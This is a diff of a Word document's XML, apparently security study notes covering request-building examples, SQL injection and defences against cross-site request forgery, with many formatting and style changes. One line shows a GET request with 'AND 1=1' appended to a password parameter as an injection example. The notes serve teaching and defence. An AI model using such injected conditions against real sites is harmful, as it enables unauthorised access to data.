+      <w:hyperlink r:id="rId3">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -459,7 +1393,31 @@
         <w:rPr>
           <w:color w:val="000000"/>
         </w:rPr>
-        <w:t>=”+ username + “&amp;motherMaidenName=” + motherMaidenName + “&amp;accountNumber=” + accountNumber”</w:t>
+        <w:t>=”+ username + “&amp;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=” + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + “&amp;accountNumber=” + accountNumber”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -546,7 +1504,7 @@
         <w:rPr/>
         <w:t xml:space="preserve">For GET requests such as: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId3">
+      <w:hyperlink r:id="rId4">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="InternetLink"/>
@@ -554,12 +1512,10 @@
           <w:t>http://example.com/?name</w:t>
         </w:r>
       </w:hyperlink>
-      <w:hyperlink r:id="rId4">
-        <w:r>
-          <w:rPr/>
-          <w:t>=&lt;username&gt;&amp;password=&lt;password&gt;</w:t>
-        </w:r>
-      </w:hyperlink>
+      <w:r>
+        <w:rPr/>
+        <w:t>=&lt;username&gt;&amp;password=&lt;password&gt;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -578,12 +1534,10 @@
           <w:t>http://example.com/?name</w:t>
         </w:r>
       </w:hyperlink>
-      <w:hyperlink r:id="rId6">
-        <w:r>
-          <w:rPr/>
-          <w:t>=&lt;username&gt;&amp;password=&lt;password&gt; AND  1=1</w:t>
-        </w:r>
-      </w:hyperlink>
+      <w:r>
+        <w:rPr/>
+        <w:t>=&lt;username&gt;&amp;password=&lt;password&gt; AND  1=1</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -648,6 +1602,46 @@
           <w:bCs/>
         </w:rPr>
         <w:t>c)Cross-site request forgery request (XSRF)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Add a hash to forms.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Add a nonce to URL and all forms.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Logging off websites after using.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Time out cookie and session so that users do not stay on the site when they visit another site.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -824,6 +1818,7 @@
       <w:pgNumType w:fmt="decimal"/>
       <w:formProt w:val="false"/>
       <w:textDirection w:val="lrTb"/>
+      <w:docGrid w:type="default" w:linePitch="100" w:charSpace="0"/>
     </w:sectPr>
   </w:body>
 </w:document>
@@ -1085,15 +2080,12 @@
       <w:rPr>
         <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Sans CJK SC Regular" w:cs="Lohit Devanagari"/>
         <w:kern w:val="2"/>
-        <w:sz w:val="24"/>
         <w:szCs w:val="24"/>
         <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault>
-      <w:pPr>
-        <w:widowControl/>
-      </w:pPr>
+      <w:pPr/>
     </w:pPrDefault>
   </w:docDefaults>
   <w:style w:type="paragraph" w:styleId="Normal">
@@ -1101,6 +2093,8 @@
     <w:qFormat/>
     <w:pPr>
       <w:widowControl/>
+      <w:bidi w:val="0"/>
+      <w:jc w:val="left"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="Noto Sans CJK SC Regular" w:cs="Lohit Devanagari"/>
@@ -1132,6 +2126,86 @@
     <w:rPr>
       <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Courier New" w:cs="Liberation Mono"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel1">
+    <w:name w:val="ListLabel 1"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:cs="OpenSymbol"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel2">
+    <w:name w:val="ListLabel 2"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:cs="OpenSymbol"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel3">
+    <w:name w:val="ListLabel 3"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:cs="OpenSymbol"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel4">
+    <w:name w:val="ListLabel 4"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:cs="OpenSymbol"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel5">
+    <w:name w:val="ListLabel 5"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:cs="OpenSymbol"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel6">
+    <w:name w:val="ListLabel 6"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:cs="OpenSymbol"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel7">
+    <w:name w:val="ListLabel 7"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:cs="OpenSymbol"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel8">
+    <w:name w:val="ListLabel 8"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:cs="OpenSymbol"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel9">
+    <w:name w:val="ListLabel 9"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:rFonts w:cs="OpenSymbol"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel10">
+    <w:name w:val="ListLabel 10"/>
+    <w:qFormat/>
+    <w:rPr>
+      <w:color w:val="000000"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel11">
+    <w:name w:val="ListLabel 11"/>
+    <w:qFormat/>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="character" w:styleId="ListLabel12">
+    <w:name w:val="ListLabel 12"/>
+    <w:qFormat/>
+    <w:rPr/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="Heading">
     <w:name w:val="Heading"/>
